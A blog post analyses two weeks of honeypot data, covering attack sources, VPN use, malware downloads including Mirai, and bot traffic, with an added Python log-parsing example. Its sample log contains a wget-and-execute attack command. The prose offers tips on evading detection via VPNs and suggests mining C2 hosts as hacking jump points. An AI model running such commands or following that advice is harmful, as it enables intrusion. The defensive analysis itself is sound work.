Analyzing Honeypot Data after 2 Weeks

Andreas Wienes
Nov 15, 2020

Two weeks ago I started a little experiment and set up the T-Pot honeypot collection on an AWS EC2 instance. This article describes what I’ve learned from analysing the collected data.

So much Noise

995,173 attacks against my server after 14 days! — There is a lot of background noise caused by fully automated attacks. So the chance is high that a real attack is overlooked.

As a defender you need to find proper ways to filter out all this noise, to achieve a clean baseline and catch the real attackers.

To make that clear:
Most of the attacks are fully automated bots and worms, spreading through the internet in search of vulnerable machines. It’s your responsibility as the owner of an internet-connected device to ensure that your system is fully patched against common exploits and that default credentials are changed to increase security.

It’s almost impossible to locate the attackers

The attacks are coming from all over the world. Therefore, you should be careful with statements about which country is responsible for the most hacking attacks. But it seems like Ireland is used as some kind of gateway for automated or bot based hacking.

56 percent of all attacks are coming from Ireland, through “Petersburg Internet Network ltd.”, a Russian-based ISP (https://pinspb.ru/).

These are the top 10 attacking IPs, which use this ISP.

A quick check on https://www.ip2proxy.com/5.8.18.90#proxyresult shows that these IPs belong to a large VPN owned by Petersburg Internet Network.

These are the network providers most frequently used for bot-based hacking.

Only a small percentage of the attackers are using the TOR network.

So if you want to be noticed as an attacker, you should use TOR. If you want to remain undetected, you should use popular VPN and proxy providers to disappear in the crowd.

Suspicious File Downloads

After the attack bots got access to my honeypot, some of them tried to download additional tools and scripts.

The attack bot with IP 212.129.29.208 used a dedicated server located in France and downloaded a script from 178.159.36.245, a server located in Russia.

The same attacker downloaded another script from 45.153.203.137, a Windows computer based in the Netherlands.

34.87.180.89 (a Google Cloud instance) downloaded a DDoS bot written in Perl (see this article for further analysis of this script: https://www.programmersought.com/article/29824452895/) from a computer located in China.

All in all it is always the same pattern. Attackers use VPN, proxy or cloud providers to launch automated attacks. In case of success they download further tools and scripts from previously hacked machines. In most cases this is malware that tries to spread further.
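The pattern described above can be pulled out of the raw honeypot logs. The following is an added example, not code from the original article: it drops the login noise and groups downloads by the host that served the payload, which gives a defender a list to feed into egress blocking or detection rules. It assumes the downloads were recorded by Cowrie in its JSON log (one event per line with `eventid`, `src_ip`, `url` and `shasum` fields); all sample events, IPs and hashes are constructed.

```python
import json
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample events (documentation-range IPs), shaped like Cowrie's JSON log.
SAMPLE_LOG = """\
{"eventid": "cowrie.login.failed", "src_ip": "192.0.2.10", "session": "a1", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.success", "src_ip": "192.0.2.20", "session": "b2", "username": "root", "password": "admin"}
{"eventid": "cowrie.command.input", "src_ip": "192.0.2.20", "session": "b2", "input": "cd /tmp; wget http://198.51.100.7/bins.sh; sh bins.sh"}
{"eventid": "cowrie.session.file_download", "src_ip": "192.0.2.20", "session": "b2", "url": "http://198.51.100.7/bins.sh", "shasum": "<constructed-sha256-1>"}
{"eventid": "cowrie.session.file_download", "src_ip": "192.0.2.20", "session": "b2", "url": "ftp://203.0.113.5/bins/x86", "shasum": "<constructed-sha256-2>"}
{"eventid": "cowrie.session.file_download", "src_ip": "192.0.2.30", "session": "c3", "url": "http://198.51.100.7/bins.sh", "shasum": "<constructed-sha256-1>"}
this line is truncated {"eventid":
"""


def summarize_downloads(lines):
    """Group file-download events by the host the payload was fetched from."""
    hosts = defaultdict(lambda: {"sources": set(), "hashes": set()})
    total = skipped = 0
    for line in lines:
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            skipped += 1  # partial write or log rotation: count it, don't crash
            continue
        total += 1
        if event.get("eventid") != "cowrie.session.file_download":
            continue  # login attempts and commands are the background noise here
        host = urlsplit(event.get("url", "")).hostname
        if host:
            hosts[host]["sources"].add(event.get("src_ip"))
            hosts[host]["hashes"].add(event.get("shasum"))
    return hosts, total, skipped


def report(hosts):
    """Download hosts ranked by how many distinct attacking IPs fetched from them."""
    ranked = sorted(hosts.items(), key=lambda kv: (-len(kv[1]["sources"]), kv[0]))
    return [(h, len(d["sources"]), len(d["hashes"])) for h, d in ranked]


if __name__ == "__main__":
    hosts, total, skipped = summarize_downloads(SAMPLE_LOG.splitlines())
    print(f"{total} events parsed, {skipped} malformed lines skipped")
    for host, n_src, n_hash in report(hosts):
        print(f"{host}: {n_src} attacking IPs, {n_hash} distinct payloads")
```

A host that several unrelated source IPs download from is a stronger candidate for blocking than one seen in a single session.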

I think it’s possible to generate a list of hosts that are used as command and control servers over time. These could be misused by bad-minded people for their own hacking attempts. So if you are looking for some jump points, running a honeypot could be a way…

Mirai

The honeypot also caught a Mirai worm, which is known for building botnets that could be used for DDoS attacks.

Let’s have a look into the downloaded shell script.

What is behind 45.153.203.129?

According to Shodan it is a computer located in the Netherlands that offers HTTP and SMB.

It’s possible to connect via FTP to this machine.

The /bins/ folder contains some binaries.

And according to virustotal.com this is the Mirai worm.

I suppose this is not the only malware file the honeypot collected. The Dionaea docker container will surely contain more and I will check this later.

Strange Messages on the Wire

The bots send a lot of Japanese and Chinese gibberish in the form of HTTP requests to different websites.

We can use CyberChef to encode these strings.

And Google translate will reveal some strange messages.

The translation heavily depends on the symbols we remove from the original string. This feels a bit scary, so I personally don’t want to know what that actually means.

The same gibberish is sent out on different ports like port 25. I think this could be some kind of DDoS against a list of targets, but I’m not sure.

SSH Input

The Cowrie honeypot also collected some SSH sessions and their input.

However, since most of this comes from bots, I will not investigate this data further for now. In the event of a real attack, however, this information can be very helpful.

Handy Tools

These tools have been very useful for further investigation:

Originally published at https://www.andreaswienes.de.
